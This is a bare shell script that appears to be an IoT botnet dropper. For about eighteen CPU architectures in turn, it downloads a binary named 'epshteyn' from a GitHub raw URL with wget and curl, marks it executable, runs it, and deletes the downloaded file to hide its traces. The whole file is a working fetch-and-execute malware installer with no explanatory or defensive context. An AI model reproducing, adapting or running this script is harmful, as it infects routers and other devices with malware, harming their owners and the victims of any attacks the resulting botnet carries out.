#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_x86_64; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_x86_64; chmod +x *; ./epshteyn_x86_64 epshteyn.x86_64; rm -rf epshteyn_x86_64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_i486; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_i486; chmod +x *; ./epshteyn_i486 epshteyn.i486; rm -rf epshteyn_i486
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_aarch64; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_aarch64; chmod +x *; ./epshteyn_aarch64 epshteyn.aarch64; rm -rf epshteyn_aarch64
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_mips; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_mips; chmod +x *; ./epshteyn_mips epshteyn.mips; rm -rf epshteyn_mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_mpsl; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_mpsl; chmod +x *; ./epshteyn_mpsl epshteyn.mpsl; rm -rf epshteyn_mpsl
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_mips32; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_mips32; chmod +x *; ./epshteyn_mips32 epshteyn.mips32; rm -rf epshteyn_mips32
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_arc; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_arc; chmod +x *; ./epshteyn_arc epshteyn.arc; rm -rf epshteyn_arc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_arm4; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_arm4; chmod +x *; ./epshteyn_arm4 epshteyn.arm4; rm -rf epshteyn_arm4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_arm5; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_arm5; chmod +x *; ./epshteyn_arm5 epshteyn.arm5; rm -rf epshteyn_arm5
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_arm6; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_arm6; chmod +x *; ./epshteyn_arm6 epshteyn.arm6; rm -rf epshteyn_arm6
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_arm7; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_arm7; chmod +x *; ./epshteyn_arm7 epshteyn.arm7; rm -rf epshteyn_arm7
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_ppc; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_ppc; chmod +x *; ./epshteyn_ppc epshteyn.ppc; rm -rf epshteyn_ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_ppc440; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_ppc440; chmod +x *; ./epshteyn_ppc440 epshteyn.ppc440; rm -rf epshteyn_ppc440
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_spc; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_spc; chmod +x *; ./epshteyn_spc epshteyn.spc; rm -rf epshteyn_spc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_m68k; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_m68k; chmod +x *; ./epshteyn_m68k epshteyn.m68k; rm -rf epshteyn_m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_sh4; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_sh4; chmod +x *; ./epshteyn_sh4 epshteyn.sh4; rm -rf epshteyn_sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_riscv32; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_riscv32; chmod +x *; ./epshteyn_riscv32 epshteyn.riscv32; rm -rf epshteyn_riscv32
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_riscv64; curl -O https://raw.githubusercontent.com/qweasdiopbosinn-sys/Epshteyn/refs/heads/main/epshteyn_riscv64; chmod +x *; ./epshteyn_riscv64 epshteyn.riscv64; rm -rf epshteyn_riscv64
